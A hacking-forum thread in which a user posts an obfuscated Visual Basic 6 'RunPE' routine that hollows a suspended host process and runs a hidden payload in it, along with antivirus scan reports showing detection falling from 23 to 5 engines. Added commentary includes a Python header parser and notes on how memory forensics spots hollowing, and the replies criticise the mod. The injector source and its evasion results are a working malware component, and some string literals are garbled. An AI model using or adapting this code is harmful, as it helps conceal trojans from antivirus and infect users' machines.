
RunPE Mod 2

  • 2 Replies
  • 4296 Views

Offline K4RUN4

  • *
  • Underc0der
  • Messages: 4
  • Reputation 0
« on: December 08, 2012, 10:54:12 pm »
Code: Visual Basic
' Posted as a "mod" of a public VB6 RunPE (process hollowing) routine. The identifiers and the
' API-name strings went through an obfuscator; the comments give the decoded names. No return
' value of any API call is checked and there is no relocation handling: the payload must load
' at its preferred ImageBase, otherwise the writes below land in memory that was never allocated.
Private Const F447LC9Xk As Long = &H10007   ' CONTEXT_FULL (x86)
Private Const nW3PkSMii As Integer = 260    ' MAX_PATH (unused)
Private Const uAEcIoE8o As Long = &H4       ' CREATE_SUSPENDED
Private Const eSzW7GQdf As Long = &H1000    ' MEM_COMMIT
Private Const HdsMEIXAx As Long = &H2000    ' MEM_RESERVE
Private Const bCd05T2O6 As Long = &H40      ' PAGE_EXECUTE_READWRITE
Private Declare Function CreateProcessA Lib "kernel32" (ByVal ZEuNODw1p As String, ByVal xMmicgUXB As String, ByVal nHQpEku43 As Long, ByVal QQ9E2IRO2 As Long, ByVal sf7Q6FWqz As Long, ByVal klh1LC0qa As Long, ByVal gpOq0ar08 As Long, ByVal lqV4QmVRl As Long, A9XZ0eH3c As IQVNXBW1K, XTbTNStC1 As IEuMTkEWN) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal fwp8F4lI1 As Long, UZLbQvjpN As Any, ADhSYKaSj As Any, ByVal rPTyCbu0O As Long, FRzhBrXZ3 As Long) As Long
Private Declare Function MJbmWIYXu Lib "kernel32" Alias "OutputDebugStringA" (ByVal vXeYdumBr As String) As Long   ' unused
' The trailing blanks inside the two Lib names below are part of the obfuscation as posted.
Public Declare Sub RtlMoveMemory Lib "kernel32            " (coZ2NvrKQ As Any, nxNRVRMkt As Any, ByVal W3EjZ6INJ As Long)
Private Declare Function CallWindowProcW Lib "user32               " (ByVal x9gbSV7nf As Long, ByVal Jwx0qigOk As Long, ByVal XMGKQAwG0 As Long, ByVal FR8tPRVTq As Long, ByVal rd7Ig24TO As Long) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal R9W0Wwz8O As Long, ByVal bEH39kATm As String) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal PSc4W5Rzh As String) As Long

Private Type l741Ghab0      ' SECURITY_ATTRIBUTES (unused)
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type
Private Type IQVNXBW1K      ' STARTUPINFO
    cb As Long
    lpReserved As Long
    lpDesktop As Long
    lpTitle As Long
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type
Private Type IEuMTkEWN      ' PROCESS_INFORMATION
    fwp8F4lI1 As Long       ' hProcess
    hThread As Long
    dwProcessId As Long
    dwThreadID As Long
End Type
Private Type Aa5vmpDi3      ' FLOATING_SAVE_AREA
    ControlWord As Long
    StatusWord As Long
    TagWord As Long
    ErrorOffset As Long
    ErrorSelector As Long
    DataOffset As Long
    DataSelector As Long
    RegisterArea(1 To 80) As Byte
    Cr0NpxState As Long
End Type
Private Type Rk3tnkYdN      ' CONTEXT (x86)
    ContextFlags As Long
    Dr0 As Long
    Dr1 As Long
    Dr2 As Long
    Dr3 As Long
    Dr6 As Long
    Dr7 As Long
    FloatSave As Aa5vmpDi3
    SegGs As Long
    SegFs As Long
    SegEs As Long
    SegDs As Long
    Edi As Long
    Esi As Long
    Ebx As Long
    Edx As Long
    Ecx As Long
    Eax As Long
    Ebp As Long
    Eip As Long
    SegCs As Long
    EFlags As Long
    Esp As Long
    SegSs As Long
End Type
Private Type K2X0B2HMz      ' IMAGE_DOS_HEADER (64 bytes)
    e_magic As Integer
    e_cblp As Integer
    e_cp As Integer
    e_crlc As Integer
    e_cparhdr As Integer
    e_minalloc As Integer
    e_maxalloc As Integer
    e_ss As Integer
    e_sp As Integer
    e_csum As Integer
    e_ip As Integer
    e_cs As Integer
    e_lfarlc As Integer
    e_ovno As Integer
    e_res(0 To 3) As Integer
    e_oemid As Integer
    e_oeminfo As Integer
    e_res2(0 To 9) As Integer
    e_lfanew As Long
End Type
Private Type DL1Kv8t0h      ' IMAGE_FILE_HEADER (20 bytes)
    Machine As Integer
    NumberOfSections As Integer
    TimeDateStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    characteristics As Integer
End Type
Private Type kEnzAI55k      ' IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
End Type
Private Type KjpHYYXJc      ' IMAGE_OPTIONAL_HEADER32 (224 bytes)
    Magic As Integer
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitializedData As Long
    SizeOfUnitializedData As Long
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ' NT additional fields.
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    W32VersionValue As Long
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    SubSystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaderFlags As Long
    NumberOfRvaAndSizes As Long
    DataDirectory(0 To 15) As kEnzAI55k
End Type
Private Type SneHkJnLR      ' IMAGE_NT_HEADERS32 (248 bytes)
    Signature As Long
    FileHeader As DL1Kv8t0h
    OptionalHeader As KjpHYYXJc
End Type
Private Type k9W00b66a      ' IMAGE_SECTION_HEADER (40 bytes)
    SecName As String * 8
    VirtualSize As Long
    VirtualAddress As Long
    SizeOfRawData As Long
    PointerToRawData As Long
    PointerToRelocations As Long
    PointerToLinenumbers As Long
    NumberOfRelocations As Integer
    NumberOfLinenumbers As Integer
    characteristics As Long
End Type

' Caesar-shift string decoder: subtracts RfhiH80fE from every character. wVAxmxZR0 below is
' an identical copy; the obfuscator nests calls to both so the API names only exist at run time.
Public Function okLbTkVkI(REbjcq5c4 As String, RfhiH80fE As Integer) As String
    Dim e2u96yIrC As Integer

    For e2u96yIrC = 1 To Len(REbjcq5c4)
        Mid(REbjcq5c4, e2u96yIrC, 1) = Chr(Asc(Mid(REbjcq5c4, e2u96yIrC, 1)) - RfhiH80fE)
    Next e2u96yIrC
    okLbTkVkI = REbjcq5c4
End Function

' RunPE: starts sHost suspended, replaces its image with the PE held in ADhSYKaSj() and resumes it.
Sub cgjyTadqQ(ByVal sHost As String, ByRef ADhSYKaSj() As Byte, parameter As String)
    Dim tFogYBkqM As Long
    Dim Bu5wgPZne As K2X0B2HMz      ' DOS header of the payload
    Dim HIKRNiitq As SneHkJnLR      ' NT headers of the payload
    Dim UhtIMHdMW As k9W00b66a      ' current section header
    Dim axquzdtgF As IQVNXBW1K      ' STARTUPINFO
    Dim lJYqbyJJM As IEuMTkEWN      ' PROCESS_INFORMATION
    Dim DukBkGsk0 As Rk3tnkYdN      ' CONTEXT of the suspended main thread
    axquzdtgF.cb = Len(axquzdtgF)
    RtlMoveMemory Bu5wgPZne, ADhSYKaSj(0), 64
    ' 248 is hardcoded: PE32 only, and SizeOfOptionalHeader is never consulted.
    RtlMoveMemory HIKRNiitq, ADhSYKaSj(Bu5wgPZne.e_lfanew), 248
    ' The command line decodes to " " & parameter; the host is created with CREATE_SUSPENDED.
    CreateProcessA sHost, okLbTkVkI(wVAxmxZR0("/", wVAxmxZR0(";", "2")), wVAxmxZR0("<", wVAxmxZR0(";", "5"))) & parameter, 0, 0, False, uAEcIoE8o, 0, 0, axquzdtgF, lJYqbyJJM
    ' ntdll!NtUnmapViewOfSection(hProcess, ImageBase): drop the host's own image.
    mOCsghEaW okLbTkVkI(wVAxmxZR0("|‚rzz", "8"), wVAxmxZR0("<", wVAxmxZR0(";", "5"))), okLbTkVkI(wVAxmxZR0("U{\uthw]pl~VmZlj{pvu", "3"), wVAxmxZR0(wVAxmxZR0(";", "2"), "5")), lJYqbyJJM.fwp8F4lI1, HIKRNiitq.OptionalHeader.ImageBase
    ' kernel32!VirtualAllocEx(hProcess, ImageBase, SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("fy‚„…q|Q||sUˆ", wVAxmxZR0("<", "3")), wVAxmxZR0("8", wVAxmxZR0(wVAxmxZR0("<", "3"), "8"))), lJYqbyJJM.fwp8F4lI1, HIKRNiitq.OptionalHeader.ImageBase, HIKRNiitq.OptionalHeader.SizeOfImage, eSzW7GQdf Or HdsMEIXAx, bCd05T2O6
    ' Copy the headers, then every section's raw data to ImageBase + VirtualAddress.
    WriteProcessMemory lJYqbyJJM.fwp8F4lI1, ByVal HIKRNiitq.OptionalHeader.ImageBase, ADhSYKaSj(0), HIKRNiitq.OptionalHeader.SizeOfHeaders, 0
    For tFogYBkqM = 0 To HIKRNiitq.FileHeader.NumberOfSections - 1
        RtlMoveMemory UhtIMHdMW, ADhSYKaSj(Bu5wgPZne.e_lfanew + 248 + 40 * tFogYBkqM), Len(UhtIMHdMW)
        WriteProcessMemory lJYqbyJJM.fwp8F4lI1, ByVal HIKRNiitq.OptionalHeader.ImageBase + UhtIMHdMW.VirtualAddress, ADhSYKaSj(UhtIMHdMW.PointerToRawData), UhtIMHdMW.SizeOfRawData, 0
    Next tFogYBkqM
    DukBkGsk0.ContextFlags = F447LC9Xk
    ' kernel32!GetThreadContext(hThread, ctx). In the initial context of a suspended process
    ' EBX holds the PEB address and EAX the address the loader will jump to.
    mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("LjyYmwjfiHtsyj}y", "4"), wVAxmxZR0(wVAxmxZR0("<", "3"), "8")), lJYqbyJJM.hThread, VarPtr(DukBkGsk0)
    ' PEB.ImageBaseAddress (PEB + 8) := ImageBase of the payload.
    WriteProcessMemory lJYqbyJJM.fwp8F4lI1, ByVal DukBkGsk0.Ebx + 8, HIKRNiitq.OptionalHeader.ImageBase, 4, 0
    DukBkGsk0.Eax = HIKRNiitq.OptionalHeader.ImageBase + HIKRNiitq.OptionalHeader.AddressOfEntryPoint
    ' kernel32!SetThreadContext. As rendered here the second literal is only 12 characters:
    ' the two shifted "t" bytes (Chr(129), unprintable) did not survive the forum rendering.
    mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("`raurnqP|{r…", "4"), wVAxmxZR0(";", "2")), lJYqbyJJM.hThread, VarPtr(DukBkGsk0)
    ' kernel32!ResumeThread; the literal as shown lost one Chr(129) byte in the same way.
    mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("`sƒ{sbv€sor", "5"), wVAxmxZR0(";", "2")), lJYqbyJJM.hThread
End Sub

' CallApiByName: resolves sLib!sMod and calls it through an x86 stub assembled in a local
' byte array and executed via CallWindowProcW (this is what DEP breaks). Stub layout:
'   58 59 59 59     pop eax / pop ecx x3   save the return address, drop 3 of the 4 dummy args
'   59 50           pop ecx / push eax     drop the 4th, put the return address back on top
'   68 imm32 ...    push each parameter, last to first (stdcall order)
'   E8 rel32        call target
'   C3              ret
' Returns 0 without calling anything if GetProcAddress fails.
Function mOCsghEaW(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
    Dim iaQt4rNA9 As Long
    Dim cluYs57Jw(&HEC00& - 1) As Byte
    Dim tFogYBkqM As Long
    Dim xsYHO71Kp As Long

    xsYHO71Kp = GetProcAddress(LoadLibraryA(sLib), sMod)
    If xsYHO71Kp = 0 Then Exit Function

    iaQt4rNA9 = VarPtr(cluYs57Jw(0))
    RtlMoveMemory ByVal iaQt4rNA9, &H59595958, &H4: iaQt4rNA9 = iaQt4rNA9 + 4
    RtlMoveMemory ByVal iaQt4rNA9, &H5059, &H2: iaQt4rNA9 = iaQt4rNA9 + 2
    For tFogYBkqM = UBound(Params) To 0 Step -1
        RtlMoveMemory ByVal iaQt4rNA9, &H68, &H1: iaQt4rNA9 = iaQt4rNA9 + 1
        RtlMoveMemory ByVal iaQt4rNA9, CLng(Params(tFogYBkqM)), &H4: iaQt4rNA9 = iaQt4rNA9 + 4
    Next
    RtlMoveMemory ByVal iaQt4rNA9, &HE8, &H1: iaQt4rNA9 = iaQt4rNA9 + 1
    RtlMoveMemory ByVal iaQt4rNA9, xsYHO71Kp - iaQt4rNA9 - 4, &H4: iaQt4rNA9 = iaQt4rNA9 + 4
    RtlMoveMemory ByVal iaQt4rNA9, &HC3, &H1: iaQt4rNA9 = iaQt4rNA9 + 1
    mOCsghEaW = CallWindowProcW(VarPtr(cluYs57Jw(0)), 0, 0, 0, 0)
End Function

' Identical to okLbTkVkI above.
Public Function wVAxmxZR0(eczX16djq As String, cW5sVXYkV As Integer) As String
    Dim wlUnDp6U2 As Integer

    For wlUnDp6U2 = 1 To Len(eczX16djq)
        Mid(eczX16djq, wlUnDp6U2, 1) = Chr(Asc(Mid(eczX16djq, wlUnDp6U2, 1)) - cW5sVXYkV)
    Next wlUnDp6U2
    wVAxmxZR0 = eczX16djq
End Function

Date and Time: 12/8/2012 8:47:39 PM
File Name: Antes.exe
File Size: 16384 Bytes
MD5: 5d0e5cf9778421e9ad666d8d74a9e116
SHA1: e2d9ccc127170966fcf49725618a59d19df1cad7
Detection: 23 of 35 (66%)
Status: INFECTED

AVG Free - Trojan horse Injector.CBI
ArcaVir - Clean!
Avast 5 - Clean!
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
VirusBuster Internet Security - Trojan.VBInject.Gen.7
Clam Antivirus - Clean!
COMODO Internet Security - Clean!
Dr.Web - Trojan.Qqlame

eTrust-Vet - Win32/VBInject.D!generic
F-PROT Antivirus - W32/VBInject.CC.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
G Data - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
IKARUS Security - Virus.Win32.VBInject
Kaspersky Antivirus - Worm.Win32.VBNA.b
McAfee - Clean!
MS Security Essentials - VirTool:Win32/VBInject.RT
ESET NOD32 - Trojan.Win32/Injector.WZ
Norman - win32/VBInject.YG
Norton Antivirus - Clean!
Panda Security - Clean!
A-Squared - Virus.Win32.VBInject!IK
Quick Heal Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Mal/VBInject-AK
Trend Micro Internet Security - Clean!
VBA32 Antivirus - infected SScope.Trojan.VBRA.3587
Vexira Antivirus - Trojan.VBInject.Gen.7
Zoner AntiVirus - Clean!
Ad-Aware - VirTool.Win32.VBInject.gen.bp (v)
BullGuard - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
Immunet Antivirus - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
K7 Ultimate - Riskware ( ed2edfef0 )
NANO Antivirus - Clean!
VIPRE - VirTool.Win32.VBInject.gen.bp (v)

Report Generated by scanner.foromalware.com

Date and Time: 12/8/2012 8:43:12 PM
File Name: Final.exe
File Size: 20480 Bytes
MD5: f6f0b5f07628932200386c2e26522310
SHA1: f626a85cff0e06a7a722cad6917bc57fd5651c8a
Detection: 5 of 35 (14%)
Status: INFECTED

AVG Free - Clean!
ArcaVir - Clean!
Avast 5 - Clean!
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Clean!
VirusBuster Internet Security - Clean!
Clam Antivirus - Clean!
COMODO Internet Security - Clean!
Dr.Web - Clean!
eTrust-Vet - Clean!
F-PROT Antivirus - Clean!
F-Secure Internet Security - Clean!
G Data - Clean!
IKARUS Security - Backdoor.Win32.Poison
Kaspersky Antivirus - Clean!
McAfee - Clean!
MS Security Essentials - Clean!
ESET NOD32 - Clean!
Norman - win32/VBInject.YG
Norton Antivirus - Clean!
Panda Security - Suspicious
A-Squared - Backdoor.Win32.Poison!IK
Quick Heal Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Clean!
Trend Micro Internet Security - Clean!
VBA32 Antivirus - Clean!
Vexira Antivirus - Clean!
Zoner AntiVirus - Clean!
Ad-Aware - Clean!
BullGuard - Clean!
Immunet Antivirus - Clean!
K7 Ultimate - Clean!
NANO Antivirus - Clean!
VIPRE - Clean!

Report Generated by scanner.foromalware.com
« Last edit: May 12, 2014, 03:36:34 pm by Expermicid »
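The routine in the post reads the payload's headers at fixed offsets and validates nothing. The following Python is an added analysis example, not code from the original post or from any RunPE: it parses a PE32 buffer the same way the VB6 code does (64-byte DOS header, e_lfanew, 248-byte NT headers, 40-byte section headers) and returns the list of WriteProcessMemory operations the injector would issue, adding the checks the posted code omits (buffer bounds, PE32 magic, SizeOfOptionalHeader instead of a hardcoded 248). The sample image is constructed inline by build_sample_image() and is not a real program.

```python
import struct
from dataclasses import dataclass

DOS_HEADER_SIZE = 64        # bytes the RunPE copies into IMAGE_DOS_HEADER
NT_HEADERS32_SIZE = 248     # 4 (Signature) + 20 (FILE_HEADER) + 224 (OPTIONAL_HEADER32)
SECTION_HEADER_SIZE = 40
PE32_MAGIC = 0x10B


@dataclass
class WritePlan:
    image_base: int
    size_of_image: int      # size VirtualAllocEx would reserve at image_base
    entry_point: int        # absolute address the injector stores in EAX
    writes: list            # (label, destination address, source offset, length)


def parse_write_plan(image: bytes) -> WritePlan:
    """Parse the headers as the injector does, but refuse what it would mis-handle."""
    if len(image) < DOS_HEADER_SIZE or image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if e_lfanew + NT_HEADERS32_SIZE > len(image):
        raise ValueError("e_lfanew points past the end of the buffer")
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    number_of_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    size_of_optional = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    magic = struct.unpack_from("<H", image, e_lfanew + 24)[0]
    if magic != PE32_MAGIC:
        # The VB6 code copies a 248-byte IMAGE_NT_HEADERS32 unconditionally; a PE32+
        # image (magic 0x20B, 64-bit ImageBase) would be silently mis-parsed.
        raise ValueError(f"unsupported optional header magic {magic:#x} (PE32 only)")
    entry_rva = struct.unpack_from("<I", image, e_lfanew + 40)[0]
    image_base = struct.unpack_from("<I", image, e_lfanew + 52)[0]
    size_of_image, size_of_headers = struct.unpack_from("<II", image, e_lfanew + 80)
    if size_of_headers > len(image):
        raise ValueError("SizeOfHeaders exceeds the buffer")
    # First write: the headers, from buffer offset 0 to ImageBase.
    writes = [("headers", image_base, 0, size_of_headers)]
    # The section table follows the optional header. The post hardcodes 248 here;
    # SizeOfOptionalHeader is what a loader actually uses.
    table = e_lfanew + 24 + size_of_optional
    for i in range(number_of_sections):
        off = table + i * SECTION_HEADER_SIZE
        if off + SECTION_HEADER_SIZE > len(image):
            raise ValueError("section table runs past the end of the buffer")
        name, _vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, off)
        label = name.rstrip(b"\0").decode("ascii", "replace")
        if raw_ptr + raw_size > len(image):
            raise ValueError(f"section {label}: raw data lies outside the buffer")
        if va + raw_size > size_of_image:
            raise ValueError(f"section {label}: write would leave the allocated image")
        writes.append((label, image_base + va, raw_ptr, raw_size))
    return WritePlan(image_base, size_of_image, image_base + entry_rva, writes)


def build_sample_image() -> bytes:
    """Constructed minimal PE32 for the demo (not a real program): .text and .data only."""
    dos = bytearray(DOS_HEADER_SIZE)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, DOS_HEADER_SIZE)                  # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x0102)  # i386, 2 sections
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, 0x1000)             # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)           # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)     # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x3000, 0x200)     # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                 # NumberOfRvaAndSizes

    def section(name, va, raw_ptr, flags):
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, relocs/lines, Characteristics
        return struct.pack("<8sIIIIIIHHI", name, 0x10, va, 0x200, raw_ptr, 0, 0, 0, 0, flags)

    headers = dos + b"PE\0\0" + file_hdr + opt
    headers += section(b".text", 0x1000, 0x200, 0x60000020)   # code, execute|read
    headers += section(b".data", 0x2000, 0x400, 0xC0000040)   # data, read|write
    text = b"\xC3".ljust(0x200, b"\0")                         # a lone RET at the entry point
    data = b"constructed sample data".ljust(0x200, b"\0")
    return bytes(headers.ljust(0x200, b"\0") + text + data)


if __name__ == "__main__":
    plan = parse_write_plan(build_sample_image())
    print(f"ImageBase {plan.image_base:#x}, SizeOfImage {plan.size_of_image:#x}, "
          f"EAX <- {plan.entry_point:#x}")
    for label, dest, src, length in plan.writes:
        print(f"  WriteProcessMemory(dst={dest:#x}, src=buf+{src:#x}, len={length:#x})  # {label}")
```

Running it prints one line per write: the headers to ImageBase, then each section to ImageBase + VirtualAddress. Every one of those writes lands in memory obtained with VirtualAllocEx, so after ResumeThread the hollowed process has a private (MEM_PRIVATE) region at ImageBase that begins with an MZ header, while the image mapping (MEM_IMAGE) backed by the host file has been unmapped and the PEB's ImageBaseAddress, rewritten by the `Ebx + 8` store in the post, points at the private region. That mismatch between the PEB, the region type and the file on disk is exactly what memory-forensics tooling checks for when it flags process hollowing.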

Offline k0ws

  • *
  • Underc0der
  • Messages: 145
  • Reputation 0
  • I'm Back
« Reply #1 on: December 10, 2012, 10:19:40 pm »
It's good that you want to contribute, but I'll say it again: this is not a well-made mod. A well-made mod is one in which the RunPEs are improved and modified wisely (CallApiByName, ZombieInvoke, etc.). What you've done is press a button :(.
Thanks anyway.

-Regards-

Offline Snifer

  • *
  • Underc0der
  • Messages: 1439
  • Reputation 1
  • Snifer@L4b's
« Reply #2 on: December 10, 2012, 10:40:44 pm »
Quote from: k0ws
It's good that you want to contribute, but I'll say it again: this is not a well-made mod. A well-made mod is one in which the RunPEs are improved and modified wisely (CallApiByName, ZombieInvoke, etc.). What you've done is press a button :(.
Thanks anyway.

-Regards-

+1 An example of what should not be done
http://www.sniferl4bs.com


They call the person who kept the forum from going down a traitor, ignorant people!



 
